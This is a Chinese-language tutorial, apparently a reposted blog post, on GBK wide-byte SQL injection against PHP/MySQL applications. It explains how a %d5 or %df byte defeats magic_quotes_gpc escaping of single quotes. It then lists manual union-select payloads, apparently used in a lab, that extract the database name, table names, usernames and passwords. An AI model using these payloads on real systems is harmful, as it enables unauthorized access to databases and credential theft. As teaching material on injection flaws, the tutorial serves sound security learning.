mysql sql宽字节注入_sql注入之(宽字节注入篇)

注入原理

在magic_quotes_gpc=On的情况下,提交的参数中如果带有单引号’,就会被自动转义\’,使很多注入攻击无效,

GBK双字节编码:一个汉字用两个字节表示,首字节对应0×81-0xFE,尾字节对应0×40-0xFE(除0×7F),刚好涵盖了转义符号对应的编码0×5C。

0xD50×5C 对应了汉字“诚”,URL编码用百分号加字符的16进制编码表示字符,于是 %d5%5c 经URL解码后为“诚”。

下面分析攻击过程:

/test.php?username=test%d5′%20or%201=1%23&pwd=test

经过浏览器编码,username参数值为(单引号的编码0×27)

username=test%d5%27%20or%201=1%23

经过php的url解码

username=test 0xd5 0×27 0×20 or 0×20 1=1 0×23 (为了便于阅读,在字符串与16进制编码之间加了空格)

经过PHP的GPC自动转义变成(单引号0×27被转义成’对应的编码0×5c0×27):

username=test 0xd5 0×5c 0×27 0×20 or 0×20 1=1 0×23

因为在数据库初始化连接的时候SET NAMES ‘gbk’,0xd50×5c解码后为诚,0×27解码为’,0×20为空格,0×23为mysql的注释符#

上面的SQL语句最终为:SELECT * FROM user WHERE username=’test诚’ or 1=1#’ and password=’test’;

注释符#后面的字符串已经无效,等价于

SELECT * FROM user WHERE username=’test诚’ or 1=1;

条件变成永真,成功注入。

补充:

0xD50×5C不是唯一可以绕过单引号转义的字符,0×81-0xFE开头+0×5C的字符应该都可以。

手工注入

开启漏洞环境,并用burp抓包

mysql sql宽字节注入_sql注入之(宽字节注入篇)_第1张图片

爆出数据库%df' union select 1,database() %23

mysql sql宽字节注入_sql注入之(宽字节注入篇)_第2张图片

爆出表%df' union select 1,group_concat(table_name) from information_schema.columns where table_schema=database() %23

mysql sql宽字节注入_sql注入之(宽字节注入篇)_第3张图片

注意:这里列出了四个users表,意味着该表下面有四个字段

爆出数据

查用户%df' union select 1,username from users where 1=1 limit 0,1 %23

mysql sql宽字节注入_sql注入之(宽字节注入篇)_第4张图片

查密码%df' union select 1, password from users where 1=1 limit 0,1 %23

mysql sql宽字节注入_sql注入之(宽字节注入篇)_第5张图片

版权属于:逍遥子大表哥

按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

你可能感兴趣的:(mysql,sql宽字节注入)